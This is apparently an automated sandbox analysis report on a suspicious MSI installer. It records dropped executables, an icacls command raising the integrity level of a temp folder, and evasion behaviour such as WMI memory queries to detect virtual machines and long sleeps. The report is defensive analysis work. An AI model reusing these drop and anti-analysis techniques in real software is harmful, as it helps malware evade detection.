Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1F4D.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\vcruntime140.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\67fcf2e8352ef94eab64e4a4d4509680.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8CB0.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\0eae52cd25d2e54183e98bebd14ba490.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\30833088ae6bfb4abc107567083083c9.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI24FC.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\fcfd202f570ae346b7d75b811246e386.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIECF4.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe (copy)	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC14D.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\3439ecd5563108439a8db68236176daf.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\vcruntime140.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\vcruntime140.dll (copy)	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe (copy)	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI931A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1F4D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8CB0.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI24FC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIECF4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC14D.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setupact.log			Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Windows\Logs\DPX\setuperr.log			Jump to behavior

Uses cacls to modify the permissions of files

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll64.exe TID: 2092

Thread sleep time: -120000s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1F4D.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\30833088ae6bfb4abc107567083083c9.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\fcfd202f570ae346b7d75b811246e386.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIECF4.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmp	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe

API coverage: 3.3 %

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation

Source: UIServices.exe, 00000039.00000002.456255231.0000018E5A610000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.437083705.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436830567.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436514987.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Proce
Source: UIServices.exe, 00000027.00000003.323791092.0000029C1E26F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: erminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service y.a
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisorw
Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipesz
Source: UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor)urQ
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partitiono
Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes`
Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus Provider PipesJp
Source: UIServices.exe, 00000027.00000002.342987817.0000029C1E28F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hannel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M
Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service1B
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus Pipes
Source: UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration ServiceXulQ
Source: UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partition c
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service\|y
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual ProcessorU
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqq
